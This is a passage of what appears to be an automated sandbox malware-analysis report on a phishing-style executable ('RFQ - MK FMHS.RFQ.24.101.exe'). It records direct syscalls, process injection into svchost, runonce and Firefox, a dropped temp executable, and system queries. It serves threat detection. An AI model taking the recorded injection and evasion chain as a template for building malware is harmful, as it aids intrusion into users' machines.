              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F2CB7E mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F28B50 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FDEB50 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FFAB40 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FD8B42 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03004940 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBC89D mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F30887 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F60854 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F42840 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F52835 mov ecx, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6A830 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBC810 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F649D0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC69C0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB89B3 mov esi, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBC97C mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00EC81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00E9A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00E9A364 SetUnhandledExceptionFilter
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtClose: Direct from: 0x76F02B6C
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
              Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exeMemory written: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\RMActivate_ssp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe protection: read write
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Section loaded: NULL target: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe protection: execute and read and write
Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe protection: execute and read and write
Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe Section loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe protection: read write
Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\runonce.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Thread register set: target process: 2424
Source: C:\Windows\SysWOW64\runonce.exe Thread register set: target process: 7012
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Thread APC queued: target process: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 3BE008
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00EC8C93 LogonUserW,0_2_00EC8C93
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00E73B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00E73B4C
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00E74A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00E74A35
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00ED4EF5 mouse_event,0_2_00ED4EF5
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe"
Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe Process created: C:\Windows\SysWOW64\RMActivate_ssp.exe "C:\Windows\SysWOW64\RMActivate_ssp.exe"
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Process created: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe"
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Process created: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe "C:\Users\user\AppData\Local\Temp\xl9lsbb.exe"
Source: C:\Program Files (x86)\cYjUrtFFzIyPCgnovHAYTKqrXaFnQdxCPxzQLFzqabcnnePPXxHIpEvKG\bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
Source: C:\Windows\SysWOW64\runonce.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00EC81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00EC81F7
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00ED4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00ED4C03
Source: RFQ - MK FMHS.RFQ.24.101.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RFQ - MK FMHS.RFQ.24.101.exe, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000000.1665927413.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102897169.0000000001930000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000000.1665927413.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102897169.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103243557.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000000.1665927413.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102897169.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103243557.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000000.1665927413.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000002.00000002.4102897169.0000000001930000.00000002.00000001.00040000.00000000.sdmp, bXQSxWgfywpImNRnlHiSPsKtqjzxm.exe, 00000005.00000002.4103243557.0000000000CB0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\RFQ - MK FMHS.RFQ.24.101.exe Code function: 0_2_00E9886B cpuid 0_2_00E9886B
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xl9lsbb.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
